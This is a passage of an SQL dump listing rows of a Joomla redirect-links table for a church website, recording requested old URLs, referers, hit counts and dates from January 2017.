(431, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/9/-', NULL, '', '', 1, 0, '2017-01-03 03:14:49', '0000-00-00 00:00:00', 301),
(432, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/30/-', NULL, '', '', 1, 0, '2017-01-03 03:18:36', '0000-00-00 00:00:00', 301),
(433, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/4/-', NULL, '', '', 1, 0, '2017-01-03 03:22:23', '0000-00-00 00:00:00', 301),
(434, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/9/-', NULL, '', '', 1, 0, '2017-01-03 03:26:10', '0000-00-00 00:00:00', 301),
(435, 'http://lifeoasisinternationalchurch.org/index.php/162-day-34', NULL, '', '', 1, 0, '2017-01-03 03:29:15', '0000-00-00 00:00:00', 301),
(436, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/26/-', NULL, '', '', 1, 0, '2017-01-03 03:29:57', '0000-00-00 00:00:00', 301),
(437, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog/itemlist/tag/CSS3', NULL, '', '', 1, 0, '2017-01-03 03:30:38', '0000-00-00 00:00:00', 301),
(438, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/2/-', NULL, '', '', 1, 0, '2017-01-03 03:33:44', '0000-00-00 00:00:00', 301),
(439, 'http://www.lifeoasisinternationalchurch.org/template-info/ljmti', NULL, '', '', 64, 0, '2017-01-03 03:36:58', '0000-00-00 00:00:00', 301),
(440, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/20/-', NULL, '', '', 1, 0, '2017-01-03 03:37:31', '0000-00-00 00:00:00', 301),
(441, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1949/1/-', NULL, '', '', 1, 0, '2017-01-03 03:49:02', '0000-00-00 00:00:00', 301),
(442, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/envato', NULL, '', '', 1, 0, '2017-01-03 04:37:37', '0000-00-00 00:00:00', 301),
(443, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/9', NULL, '', '', 1, 0, '2017-01-03 07:07:21', '0000-00-00 00:00:00', 301),
(444, 'https://www.spiritmeat.net/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&Itemid=189', NULL, '', '', 1, 0, '2017-01-03 07:07:43', '0000-00-00 00:00:00', 301),
(445, 'http://lifeoasisinternationalchurch.org/index.php/programme', NULL, '', '', 1, 0, '2017-01-03 07:20:56', '0000-00-00 00:00:00', 301),
(446, 'http://lifeoasisinternationalchurch.org/finance/index.php', NULL, '', '', 1, 0, '2017-01-03 07:20:56', '0000-00-00 00:00:00', 301),
(447, 'http://ljmti.lifeoasisinternationalchurch.org/bottom-contact-us', NULL, '', '', 1, 0, '2017-01-03 07:25:12', '0000-00-00 00:00:00', 301),
(448, 'http://www.lifeoasisinternationalchurch.org/resources/baptism', NULL, '', '', 58, 0, '2017-01-03 07:38:34', '0000-00-00 00:00:00', 301),
(449, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/9', NULL, '', '', 4, 0, '2017-01-03 07:42:22', '0000-00-00 00:00:00', 301),
(450, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/popup?tmpl=component', NULL, '', '', 66, 0, '2017-01-03 07:50:51', '0000-00-00 00:00:00', 301),
(451, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 10, 0, '2017-01-03 07:57:26', '0000-00-00 00:00:00', 301),
(452, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/responsive', NULL, '', '', 1, 0, '2017-01-03 07:58:37', '0000-00-00 00:00:00', 301),
(453, 'http://www.lifeoasisinternationalchurch.org/template-info/outreach', NULL, '', '', 54, 0, '2017-01-03 08:06:55', '0000-00-00 00:00:00', 301),
(454, 'http://www.lifeoasisinternationalchurch.org/resources/seminar', NULL, '', '', 42, 0, '2017-01-03 08:10:27', '0000-00-00 00:00:00', 301),
(455, 'http://www.lifeoasisinternationalchurch.org/resources/online-bible', NULL, '', '', 42, 0, '2017-01-03 08:10:28', '0000-00-00 00:00:00', 301),
(456, 'http://www.lifeoasisinternationalchurch.org/resources/2013-gobc-online-registration?view=remind', NULL, '', '', 1, 0, '2017-01-03 09:00:51', '0000-00-00 00:00:00', 301),
(457, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/arrowthemes', NULL, '', '', 1, 0, '2017-01-03 09:05:36', '0000-00-00 00:00:00', 301),
(458, 'http://lifeoasisinternationalchurch.org/template-info-2/the-church', NULL, '', '', 70, 0, '2017-01-03 09:17:52', '0000-00-00 00:00:00', 301),
(459, 'http://lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-a7413756639d75a4b8ce2f4ac085019d.php', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 22, 0, '2017-01-03 09:46:47', '0000-00-00 00:00:00', 301),
(460, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-media/itemlist/tag/WordPress', NULL, '', '', 1, 0, '2017-01-03 10:12:32', '0000-00-00 00:00:00', 301),
(461, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/theme?format=feed&limitstart=&type=atom', NULL, '', '', 3, 0, '2017-01-03 10:46:02', '0000-00-00 00:00:00', 301),
(462, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/28/-', NULL, '', '', 1, 0, '2017-01-03 10:49:23', '0000-00-00 00:00:00', 301),
(463, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/3/-', NULL, '', '', 1, 0, '2017-01-03 10:49:25', '0000-00-00 00:00:00', 301),
(464, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/10/-', NULL, '', '', 1, 0, '2017-01-03 10:49:34', '0000-00-00 00:00:00', 301),
(465, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/8/-', NULL, '', '', 1, 0, '2017-01-03 10:49:43', '0000-00-00 00:00:00', 301),
(466, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/28/-', NULL, '', '', 1, 0, '2017-01-03 10:49:55', '0000-00-00 00:00:00', 301),
(467, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/15/-', NULL, '', '', 1, 0, '2017-01-03 10:49:59', '0000-00-00 00:00:00', 301),
(468, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/20/-', NULL, '', '', 1, 0, '2017-01-03 10:50:08', '0000-00-00 00:00:00', 301),
(469, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/4/-', NULL, '', '', 1, 0, '2017-01-03 10:50:16', '0000-00-00 00:00:00', 301),
(470, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/18/-', NULL, '', '', 1, 0, '2017-01-03 10:50:25', '0000-00-00 00:00:00', 301),
(471, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/7/-', NULL, '', '', 1, 0, '2017-01-03 10:50:37', '0000-00-00 00:00:00', 301),
(472, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/9/-', NULL, '', '', 1, 0, '2017-01-03 10:50:41', '0000-00-00 00:00:00', 301),
(473, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/6/-', NULL, '', '', 1, 0, '2017-01-03 10:50:50', '0000-00-00 00:00:00', 301),
(474, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/26/-', NULL, '', '', 1, 0, '2017-01-03 10:50:59', '0000-00-00 00:00:00', 301),
(475, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/8/-', NULL, '', '', 1, 0, '2017-01-03 10:51:07', '0000-00-00 00:00:00', 301),
(476, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/5/-', NULL, '', '', 1, 0, '2017-01-03 10:51:15', '0000-00-00 00:00:00', 301),
(477, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/2/-', NULL, '', '', 1, 0, '2017-01-03 10:51:24', '0000-00-00 00:00:00', 301),
(478, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/26/-', NULL, '', '', 1, 0, '2017-01-03 10:51:32', '0000-00-00 00:00:00', 301),
(479, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/3/-', NULL, '', '', 1, 0, '2017-01-03 10:51:41', '0000-00-00 00:00:00', 301),
(480, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/16/-', NULL, '', '', 1, 0, '2017-01-03 10:51:49', '0000-00-00 00:00:00', 301),
(481, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/31/-', NULL, '', '', 1, 0, '2017-01-03 10:51:58', '0000-00-00 00:00:00', 301),
(482, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/11/-', NULL, '', '', 1, 0, '2017-01-03 10:52:06', '0000-00-00 00:00:00', 301),
(483, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/23/-', NULL, '', '', 1, 0, '2017-01-03 10:52:15', '0000-00-00 00:00:00', 301),
(484, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1950/11/-', NULL, '', '', 1, 0, '2017-01-03 10:52:23', '0000-00-00 00:00:00', 301),
(485, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/8/-', NULL, '', '', 1, 0, '2017-01-03 10:52:52', '0000-00-00 00:00:00', 301),
(486, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=WordPress', NULL, '', '', 1, 0, '2017-01-03 11:19:28', '0000-00-00 00:00:00', 301),
(487, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/22-dealing-with-buts-in-your-life-2', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 62, 0, '2017-01-03 12:57:47', '0000-00-00 00:00:00', 301),
(488, 'http://lifeoasisinternationalchurch.org/41-prayer-a-fasting-day-32', NULL, '', '', 24, 0, '2017-01-03 13:35:15', '0000-00-00 00:00:00', 301),
(489, 'http://lifeoasisinternationalchurch.org/174-focus40-3', NULL, '', '', 2, 0, '2017-01-03 13:35:16', '0000-00-00 00:00:00', 301),
(490, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-media/itemlist/tag/Lighthouse', NULL, '', '', 1, 0, '2017-01-03 13:50:07', '0000-00-00 00:00:00', 301),
(491, 'http://lifeoasisinternationalchurch.org/136-20148', NULL, '', '', 2, 0, '2017-01-03 13:55:03', '0000-00-00 00:00:00', 301),
(492, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, '', '', 112, 0, '2017-01-03 13:55:04', '0000-00-00 00:00:00', 301),
(493, 'http://lifeoasisinternationalchurch.org/18-loic/34-music', NULL, '', '', 9, 0, '2017-01-03 13:55:05', '0000-00-00 00:00:00', 301),
(494, 'http://lifeoasisinternationalchurch.org/156-focus32-3', NULL, '', '', 2, 0, '2017-01-03 13:55:06', '0000-00-00 00:00:00', 301),
(495, 'http://lifeoasisinternationalchurch.org/12-sample-content/18-sample-content-7?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-01-03 14:12:09', '0000-00-00 00:00:00', 301),
(496, 'http://lifeoasisinternationalchurch.org/about-us/dream-centre-ordained-pastors/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-03 14:12:11', '0000-00-00 00:00:00', 301),
(497, 'http://lifeoasisinternationalchurch.org/about-us/our-service-schedule', NULL, '', '', 45, 0, '2017-01-03 14:12:11', '0000-00-00 00:00:00', 301),
(498, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/Lighthouse', NULL, '', '', 1, 0, '2017-01-03 14:23:36', '0000-00-00 00:00:00', 301),
(499, 'http://lifeoasisinternationalchurch.org/index.php/153-day-26', NULL, '', '', 1, 0, '2017-01-03 14:28:44', '0000-00-00 00:00:00', 301),
(500, 'http://lifeoasisinternationalchurch.org/template-info-2/rev-oyenike-areogun', NULL, '', '', 71, 0, '2017-01-03 14:28:44', '0000-00-00 00:00:00', 301),
(501, 'http://lifeoasisinternationalchurch.org/about-us/the-church-2', NULL, '', '', 67, 0, '2017-01-03 14:29:49', '0000-00-00 00:00:00', 301),
(502, 'http://lifeoasisinternationalchurch.org/about-us/the-church-2/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-03 14:29:49', '0000-00-00 00:00:00', 301),
(503, 'http://lifeoasisinternationalchurch.org/63-day-11', NULL, '', '', 3, 0, '2017-01-03 14:36:31', '0000-00-00 00:00:00', 301),
(504, 'http://lifeoasisinternationalchurch.org/143-2014-14', NULL, '', '', 2, 0, '2017-01-03 14:36:32', '0000-00-00 00:00:00', 301),
(505, 'http://lifeoasisinternationalchurch.org/139-2014-10', NULL, '', '', 2, 0, '2017-01-03 14:36:32', '0000-00-00 00:00:00', 301),
(506, 'http://lifeoasisinternationalchurch.org/135-2014-6', NULL, '', '', 2, 0, '2017-01-03 14:36:32', '0000-00-00 00:00:00', 301),
(507, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/2?limitstart=0', NULL, '', '', 2, 0, '2017-01-03 14:38:11', '0000-00-00 00:00:00', 301),
(508, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/30-tapping-into-the-anointing-for-increase-3', NULL, '', '', 13, 0, '2017-01-03 14:39:00', '0000-00-00 00:00:00', 301),
(509, 'http://lifeoasisinternationalchurch.org/137-2014-8', NULL, '', '', 2, 0, '2017-01-03 14:42:14', '0000-00-00 00:00:00', 301),
(510, 'http://lifeoasisinternationalchurch.org/20-prayer-a-fasting-day-11', NULL, '', '', 11, 0, '2017-01-03 14:42:14', '0000-00-00 00:00:00', 301),
(511, 'http://lifeoasisinternationalchurch.org/12-sample-content/18-sample-content-7', NULL, '', '', 6, 0, '2017-01-03 14:42:15', '0000-00-00 00:00:00', 301),
(512, 'http://lifeoasisinternationalchurch.org/media.php', NULL, '', '', 20, 0, '2017-01-03 14:42:16', '0000-00-00 00:00:00', 301),
(513, 'http://lifeoasisinternationalchurch.org/ministries/media-outreach/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-01-03 14:42:16', '0000-00-00 00:00:00', 301),
(514, 'http://lifeoasisinternationalchurch.org/about-us/rev-oyenike-areogun/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-03 14:42:17', '0000-00-00 00:00:00', 301),
(515, 'http://lifeoasisinternationalchurch.org/57-prophetic-words-for-day-5', NULL, '', '', 2, 0, '2017-01-03 14:42:18', '0000-00-00 00:00:00', 301),
(516, 'http://ljmti.lifeoasisinternationalchurch.org/joomla/registration', NULL, '', '', 2, 0, '2017-01-03 14:57:05', '0000-00-00 00:00:00', 301),
(517, 'http://www.lifeoasisinternationalchurch.org/54-day3', NULL, '', '', 7, 0, '2017-01-03 15:56:23', '0000-00-00 00:00:00', 301),
(518, 'http://www.lifeoasisinternationalchurch.org/resources/2013-gobc-online-registration', NULL, '', '', 114, 0, '2017-01-03 16:00:59', '0000-00-00 00:00:00', 301),
(519, 'https://www.spiritmeat.net/resources/podcast', NULL, '', '', 1, 0, '2017-01-03 16:07:04', '0000-00-00 00:00:00', 301),
(520, 'http://lifeoasisinternationalchurch.org/about-us/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-03 16:27:48', '0000-00-00 00:00:00', 301),
(521, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 2, 0, '2017-01-03 16:27:48', '0000-00-00 00:00:00', 301),
(522, 'http://www.lifeoasisinternationalchurch.org/resources/sermon', NULL, '', '', 53, 0, '2017-01-03 18:31:38', '0000-00-00 00:00:00', 301),
(523, 'http://lifeoasisinternationalchurch.org/index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'http://lifeoasisinternationalchurch.org/', '', 3408, 0, '2017-01-03 18:37:26', '0000-00-00 00:00:00', 301),
(524, 'http://lifeoasisinternationalchurch.org/templates/rt_ionosphere/roksprocket/layouts/features/themes/slideshow/css-d768001f3c2bf8ee35738bc5c28af2db.php', NULL, '', '', 30, 0, '2017-01-03 18:56:48', '0000-00-00 00:00:00', 301),
(525, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/2', NULL, '', '', 22, 0, '2017-01-03 18:59:37', '0000-00-00 00:00:00', 301),
(526, 'http://lifeoasisinternationalchurch.org/ministries/wimmp/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-01-03 19:08:03', '0000-00-00 00:00:00', 301),
(527, 'http://lifeoasisinternationalchurch.org/ministries/mimmp/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-03 19:08:03', '0000-00-00 00:00:00', 301),
(528, 'http://lifeoasisinternationalchurch.org/50-prayer-a-fasting-day-40', NULL, '', '', 24, 0, '2017-01-03 19:08:03', '0000-00-00 00:00:00', 301),
(529, 'http://lifeoasisinternationalchurch.org/49-prophetic-words-for-day-39', NULL, '', '', 8, 0, '2017-01-03 19:08:03', '0000-00-00 00:00:00', 301),
(530, 'http://lifeoasisinternationalchurch.org/featured-messages/18-loic/50-young-achievers', NULL, '', '', 8, 0, '2017-01-03 19:08:05', '0000-00-00 00:00:00', 301),
(531, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/15-prayer-a-fasting-day-6', NULL, '', '', 2, 0, '2017-01-03 19:08:05', '0000-00-00 00:00:00', 301),
(532, 'https://www.spiritmeat.net/payment', NULL, '', '', 1, 0, '2017-01-03 19:30:04', '0000-00-00 00:00:00', 301),
(533, 'https://www.spiritmeat.net/resources/baptism', NULL, '', '', 2, 0, '2017-01-03 19:30:10', '0000-00-00 00:00:00', 301),
(534, 'https://www.spiritmeat.net/resources/father-s-heart', NULL, '', '', 2, 0, '2017-01-03 19:30:33', '0000-00-00 00:00:00', 301),
(535, 'https://www.spiritmeat.net/resources/salvation', NULL, '', '', 2, 0, '2017-01-03 19:30:39', '0000-00-00 00:00:00', 301),
(536, 'https://www.spiritmeat.net/resources/stream', NULL, '', '', 2, 0, '2017-01-03 19:30:45', '0000-00-00 00:00:00', 301),
(537, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/58-prayer-a-fasting-day', NULL, '', '', 3, 0, '2017-01-03 19:38:20', '0000-00-00 00:00:00', 301),
(538, 'http://www.lifeoasisinternationalchurch.org/12-sample-content/12-sample-content-1', NULL, '', '', 13, 0, '2017-01-03 20:02:43', '0000-00-00 00:00:00', 301),
(539, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/63-disclaimer', NULL, '', '', 12, 0, '2017-01-03 21:42:19', '0000-00-00 00:00:00', 301),
(540, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermons?sermon_cat=21', NULL, '', '', 6, 0, '2017-01-03 22:47:25', '0000-00-00 00:00:00', 301),
(541, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/24/-', NULL, '', '', 1, 0, '2017-01-03 23:18:30', '0000-00-00 00:00:00', 301),
(542, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/8/-', NULL, '', '', 1, 0, '2017-01-03 23:18:46', '0000-00-00 00:00:00', 301),
(543, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/1/-', NULL, '', '', 1, 0, '2017-01-03 23:18:49', '0000-00-00 00:00:00', 301),
(544, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/5/-', NULL, '', '', 1, 0, '2017-01-03 23:18:54', '0000-00-00 00:00:00', 301),
(545, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/20/-', NULL, '', '', 1, 0, '2017-01-03 23:19:03', '0000-00-00 00:00:00', 301),
(546, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/28/-', NULL, '', '', 1, 0, '2017-01-03 23:19:12', '0000-00-00 00:00:00', 301),
(547, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/2/-', NULL, '', '', 1, 0, '2017-01-03 23:19:28', '0000-00-00 00:00:00', 301),
(548, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/14/-', NULL, '', '', 1, 0, '2017-01-03 23:19:45', '0000-00-00 00:00:00', 301),
(549, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/13/-', NULL, '', '', 1, 0, '2017-01-03 23:20:01', '0000-00-00 00:00:00', 301),
(550, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/4/-', NULL, '', '', 1, 0, '2017-01-03 23:20:21', '0000-00-00 00:00:00', 301),
(551, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/31/-', NULL, '', '', 1, 0, '2017-01-03 23:20:37', '0000-00-00 00:00:00', 301),
(552, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/1/-', NULL, '', '', 1, 0, '2017-01-03 23:20:57', '0000-00-00 00:00:00', 301),
(553, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/31/-', NULL, '', '', 1, 0, '2017-01-03 23:21:12', '0000-00-00 00:00:00', 301),
(554, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/18/-', NULL, '', '', 1, 0, '2017-01-03 23:21:30', '0000-00-00 00:00:00', 301),
(555, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/11/-', NULL, '', '', 1, 0, '2017-01-03 23:24:19', '0000-00-00 00:00:00', 301),
(556, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/21/-', NULL, '', '', 1, 0, '2017-01-03 23:28:06', '0000-00-00 00:00:00', 301),
(557, 'http://lifeoasisinternationalchurch.org/component/k2/i…', NULL, '', '', 1, 0, '2017-01-03 23:29:54', '0000-00-00 00:00:00', 301),
(558, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/1/-', NULL, '', '', 1, 0, '2017-01-03 23:31:53', '0000-00-00 00:00:00', 301),
(559, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/28', NULL, '', '', 5, 0, '2017-01-03 23:32:42', '0000-00-00 00:00:00', 301),
(560, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/itemlist/tag/church', NULL, '', '', 1, 0, '2017-01-03 23:33:35', '0000-00-00 00:00:00', 301),
(561, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/23/-', NULL, '', '', 1, 0, '2017-01-03 23:35:38', '0000-00-00 00:00:00', 301),
(562, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/24/-', NULL, '', '', 1, 0, '2017-01-03 23:39:25', '0000-00-00 00:00:00', 301),
(563, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/19/-', NULL, '', '', 1, 0, '2017-01-03 23:43:12', '0000-00-00 00:00:00', 301),
(564, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/18/-', NULL, '', '', 1, 0, '2017-01-03 23:46:59', '0000-00-00 00:00:00', 301),
(565, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/7/-', NULL, '', '', 1, 0, '2017-01-03 23:50:46', '0000-00-00 00:00:00', 301),
(566, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/1/-', NULL, '', '', 1, 0, '2017-01-03 23:54:38', '0000-00-00 00:00:00', 301),
(567, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/20/-', NULL, '', '', 1, 0, '2017-01-03 23:58:20', '0000-00-00 00:00:00', 301),
(568, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/13/-', NULL, '', '', 1, 0, '2017-01-04 00:05:59', '0000-00-00 00:00:00', 301),
(569, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/13/-', NULL, '', '', 1, 0, '2017-01-04 00:09:41', '0000-00-00 00:00:00', 301),
(570, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/29/-', NULL, '', '', 1, 0, '2017-01-04 00:13:28', '0000-00-00 00:00:00', 301),
(571, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/15/-', NULL, '', '', 1, 0, '2017-01-04 00:17:15', '0000-00-00 00:00:00', 301),
(572, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/20/-', NULL, '', '', 1, 0, '2017-01-04 00:21:11', '0000-00-00 00:00:00', 301),
(573, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/7/-', NULL, '', '', 1, 0, '2017-01-04 00:24:52', '0000-00-00 00:00:00', 301),
(574, 'http://www.lifeoasisinternationalchurch.org/devotional/about', NULL, '', '', 1, 0, '2017-01-04 00:27:16', '0000-00-00 00:00:00', 301),
(575, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1949/11/-', NULL, '', '', 1, 0, '2017-01-04 00:28:40', '0000-00-00 00:00:00', 301),
(576, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-notes/itemlist/tag/arrowthemes', NULL, '', '', 1, 0, '2017-01-04 00:40:39', '0000-00-00 00:00:00', 301),
(577, 'http://www.lifeoasisinternationalchurch.org/mp3-messages', NULL, '', '', 189, 0, '2017-01-04 01:01:56', '0000-00-00 00:00:00', 301),
(578, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog/itemlist/tag/WordPress', NULL, '', '', 1, 0, '2017-01-04 02:40:07', '0000-00-00 00:00:00', 301),
(579, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/18-army-of-the-lord-1', NULL, '', '', 32, 0, '2017-01-04 03:19:29', '0000-00-00 00:00:00', 301),
(580, 'http://www.lifeoasisinternationalchurch.org/resources/streaming2', NULL, '', '', 54, 0, '2017-01-04 03:26:27', '0000-00-00 00:00:00', 301),
(581, 'http://www.lifeoasisinternationalchurch.org/apple-app-site-association', NULL, '', '', 37, 0, '2017-01-04 04:31:59', '0000-00-00 00:00:00', 301),
(582, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog/itemlist/tag/church', NULL, '', '', 1, 0, '2017-01-04 05:31:36', '0000-00-00 00:00:00', 301),
(583, 'http://www.lifeoasisinternationalchurch.org/ministries/musci', NULL, '', '', 36, 0, '2017-01-04 05:41:36', '0000-00-00 00:00:00', 301),
(584, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/28', NULL, '', '', 6, 0, '2017-01-04 05:57:50', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(585, 'http://lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', NULL, 'http://lifeoasisinternationalchurch.org/index.php/component/users/?view=registration', '', 3861, 0, '2017-01-04 06:03:01', '0000-00-00 00:00:00', 301),
(586, 'http://lifeoasisinternationalchurch.org/index.php/component/user/?task=register', NULL, 'http://lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 28, 0, '2017-01-04 06:03:01', '0000-00-00 00:00:00', 301),
(587, 'http://www.lifeoasisinternationalchurch.org/index.php/205-2015-day-31', NULL, '', '', 7, 0, '2017-01-04 06:33:19', '0000-00-00 00:00:00', 301),
(588, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-notes/itemlist/tag/envato', NULL, '', '', 1, 0, '2017-01-04 06:38:36', '0000-00-00 00:00:00', 301),
(589, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/3', NULL, '', '', 10, 0, '2017-01-04 07:34:20', '0000-00-00 00:00:00', 301),
(590, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 3, 0, '2017-01-04 07:34:21', '0000-00-00 00:00:00', 301),
(591, 'http://www.lifeoasisinternationalchurch.org/about-us/our-service-schedule', NULL, '', '', 43, 0, '2017-01-04 07:57:45', '0000-00-00 00:00:00', 301),
